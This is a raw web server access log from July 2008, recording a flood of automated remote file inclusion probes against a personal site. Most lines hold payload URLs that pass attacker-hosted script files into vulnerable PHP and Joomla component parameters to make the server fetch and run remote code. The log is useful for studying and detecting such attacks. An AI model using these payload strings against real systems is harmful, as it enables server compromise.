204.15.135.98 - - [06/Jul/2008:09:09:56 -0700] "GET //components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:09:56 -0700] "GET /logs//components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.4.48.210 - - [06/Jul/2008:09:10:15 -0700] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://x-femdom.net/st/img/icons/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
202.4.48.210 - - [06/Jul/2008:09:10:15 -0700] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://x-femdom.net/st/img/icons/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:10:15 -0700] "GET /logs//main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:10:15 -0700] "GET //main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [06/Jul/2008:09:10:19 -0700] "GET /logs/access.log/vwebmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.nmla.org/lang.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [06/Jul/2008:09:10:20 -0700] "GET /vwebmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.nmla.org/lang.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.179.18 - - [06/Jul/2008:09:10:20 -0700] "GET /logs/vwebmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.nmla.org/lang.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.193.236.1 - - [06/Jul/2008:09:10:29 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://www.librosdesegundamano.com/libros/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:10:29 -0700] "GET /logs//main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.193.236.1 - - [06/Jul/2008:09:10:29 -0700] "GET //components/errors.php?error=http://www.librosdesegundamano.com/libros/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.230.33 - - [06/Jul/2008:09:10:29 -0700] "GET //main.php?pagina=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.193.236.1 - - [06/Jul/2008:09:10:30 -0700] "GET /logs//components/errors.php?error=http://www.librosdesegundamano.com/libros/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:10:31 -0700] "GET /logs/access_071219.log/:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:10:41 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.193.236.1 - - [06/Jul/2008:09:10:43 -0700] "GET /logs/access_071222.log//components/errors.php?error=http://www.librosdesegundamano.com/libros/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:10:46 -0700] "GET /logs/access_080507.log/index2.php?url_page=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.198.217.3 - - [06/Jul/2008:09:10:47 -0700] "GET ///components/com_flyspray/startdown.php?file=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.27 - - [06/Jul/2008:09:10:54 -0700] "GET /bikes/dteel/2008_02_16/Arryo_Seco/?N=D HTTP/1.1" 200 8443 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:10:59 -0700] "GET /port.php?content=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.73.117 - - [06/Jul/2008:09:11:14 -0700] "GET /logs/access_080315.log//component/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.34 - - [06/Jul/2008:09:11:21 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [06/Jul/2008:09:11:21 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [06/Jul/2008:09:11:22 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:11:23 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.30.73.117 - - [06/Jul/2008:09:11:26 -0700] "GET /logs/access_080315.log//component/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:11:26 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:11:30 -0700] "GET /logs/access_071219.log/:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.130.79.34 - - [06/Jul/2008:09:11:37 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:11:37 -0700] "GET /logs//components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:11:44 -0700] "GET /logs/access_080207.log/:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.198.217.3 - - [06/Jul/2008:09:11:49 -0700] "GET /logs///components/com_flyspray/startdown.php?file=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:11:49 -0700] "GET /:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.198.217.3 - - [06/Jul/2008:09:11:50 -0700] "GET ///components/com_flyspray/startdown.php?file=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:11:51 -0700] "GET /logs/access.log/index1.php?site=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:11:51 -0700] "GET /logs/index1.php?site=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:11:53 -0700] "GET /logs/access_080103.log/index1.php?site=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.36 - - [06/Jul/2008:09:11:56 -0700] "GET /logs/access_080523.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:11:58 -0700] "GET /logs/:/components/errors.php?error=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.240.98 - - [06/Jul/2008:09:12:04 -0700] "GET /logs///components/com_flyspray/startdown.php?file=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.240.98 - - [06/Jul/2008:09:12:04 -0700] "GET ///components/com_flyspray/startdown.php?file=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.139.226 - - [06/Jul/2008:09:12:41 -0700] "GET /logs/access_080313.log/index1.php?=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [06/Jul/2008:09:12:42 -0700] "GET /index1.php?=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [06/Jul/2008:09:12:42 -0700] "GET /logs/index1.php?=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:09:12:43 -0700] "GET /logs///components/com_flyspray/startdown.php?file=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:09:12:44 -0700] "GET ///components/com_flyspray/startdown.php?file=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:09:13:01 -0700] "GET /logs/index1.php?choix=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.137.51 - - [06/Jul/2008:09:13:01 -0700] "GET /index1.php?choix=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.193.237.1 - - [06/Jul/2008:09:13:03 -0700] "GET /:/components/errors.php?error=http://www.librosdesegundamano.com/libros/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:13:13 -0700] "GET /index2.php?url_page=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.123.68.13 - - [06/Jul/2008:09:13:30 -0700] "GET /logs/access_080215.log/admin/home/index.php?x=http://www.st-pieter.be/~sjc/contactdigitaal/core/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.123.68.13 - - [06/Jul/2008:09:13:30 -0700] "GET /admin/home/index.php?x=http://www.st-pieter.be/~sjc/contactdigitaal/core/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.123.68.13 - - [06/Jul/2008:09:13:31 -0700] "GET /logs/admin/home/index.php?x=http://www.st-pieter.be/~sjc/contactdigitaal/core/ec? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:13:34 -0700] "GET /home.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.34 - - [06/Jul/2008:09:13:45 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [06/Jul/2008:09:13:45 -0700] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [06/Jul/2008:09:13:45 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.229.130 - - [06/Jul/2008:09:13:52 -0700] "GET /logs/access.log//index.php?lang=en&page=http://www.harvestresources.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.193.236.1 - - [06/Jul/2008:09:13:53 -0700] "GET //components/errors.php?error=http://www.librosdesegundamano.com/libros/img/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.24.133.93 - - [06/Jul/2008:09:13:56 -0700] "GET /index2.php?x=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.34 - - [06/Jul/2008:09:14:03 -0700] "GET /logs/access_080329.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://middlestreet.org.uk/Timeline/.log/n??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:14:10 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:14:10 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:14:10 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:14:10 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:14:10 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:14:10 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:09:14:11 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:14:12 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:14:13 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.78.40.57 - - [06/Jul/2008:09:14:13 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.letstalkrecipes.com/templates/paddy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.238.195.13 - - [06/Jul/2008:09:14:21 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [06/Jul/2008:09:14:21 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [06/Jul/2008:09:14:22 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.homeimmobiliare.eu/images/banners/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:14:24 -0700] "GET /logs/home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.135.98 - - [06/Jul/2008:09:14:24 -0700] "GET /home.php?x=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:14:30 -0700] "GET //main.php?sayfa=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
84.96.78.30 - - [06/Jul/2008:09:14:31 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:09:14:39 -0700] "GET ///components/com_jd-wp/wp-comments-post.php?mosConfig_absolute_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:14:53 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:14:53 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:09:15:03 -0700] "GET /logs/access_080215.log/*inc*.php?get=http://redsraiders.com/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:09:15:04 -0700] "GET /*inc*.php?get=http://redsraiders.com/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:09:15:04 -0700] "GET /logs/*inc*.php?get=http://redsraiders.com/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.82.111 - - [06/Jul/2008:09:15:53 -0700] "GET /logs/access_080312.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.82.111 - - [06/Jul/2008:09:15:53 -0700] "GET /logs/access_080312.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.82.111 - - [06/Jul/2008:09:15:53 -0700] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.82.111 - - [06/Jul/2008:09:15:53 -0700] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.82.111 - - [06/Jul/2008:09:15:53 -0700] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.82.111 - - [06/Jul/2008:09:15:54 -0700] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.227.193.215 - - [06/Jul/2008:09:16:00 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.198.175.18 - - [06/Jul/2008:09:16:05 -0700] "GET /logs/index.php?classified_path=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
116.125.113.115 - - [06/Jul/2008:09:16:07 -0700] "GET /logs/access_080215.log/*inc*.php?get=http://redsraiders.com/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [06/Jul/2008:09:16:08 -0700] "GET /*inc*.php?get=http://redsraiders.com/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
116.125.113.115 - - [06/Jul/2008:09:16:08 -0700] "GET /logs/*inc*.php?get=http://redsraiders.com/forum/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.198.175.18 - - [06/Jul/2008:09:16:11 -0700] "GET /index.php?classified_path=http://www.vanderjagt-kraanverhuur.nl/id.txt? HTTP/1.1" 200 18411 "-" "libwww-perl/5.808" "www.dmulk.com"
208.75.225.10 - - [06/Jul/2008:09:16:11 -0700] "GET /logs/access_080313.log/index1.php?=http://h1.ripway.com/keynet/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.75.225.10 - - [06/Jul/2008:09:16:11 -0700] "GET /index1.php?=http://h1.ripway.com/keynet/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.75.225.10 - - [06/Jul/2008:09:16:12 -0700] "GET /logs/index1.php?=http://h1.ripway.com/keynet/bot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:09:16:20 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:09:16:20 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.40 - - [06/Jul/2008:09:16:20 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
222.251.223.180 - - [06/Jul/2008:09:16:22 -0700] "GET /index1.php?x=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:16:22 -0700] "GET /logs/access_080312.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:16:22 -0700] "GET /logs/access_080312.log/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:16:22 -0700] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:16:22 -0700] "GET /include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:16:23 -0700] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.56.7 - - [06/Jul/2008:09:16:23 -0700] "GET /logs/include/livre_include.php?no_connect=lol&chem_absolu=http://www.tak-ita.com/port/images/avatars/176666876547cbcb766b0f2.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.142.64 - - [06/Jul/2008:09:16:40 -0700] "GET /index2.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
85.25.142.64 - - [06/Jul/2008:09:16:40 -0700] "GET /logs/index2.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
85.114.130.225 - - [06/Jul/2008:09:16:55 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.130.225 - - [06/Jul/2008:09:16:56 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.130.225 - - [06/Jul/2008:09:16:56 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.130.225 - - [06/Jul/2008:09:16:56 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.130.225 - - [06/Jul/2008:09:16:56 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.130.225 - - [06/Jul/2008:09:16:57 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://h1.ripway.com/deaddevil/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
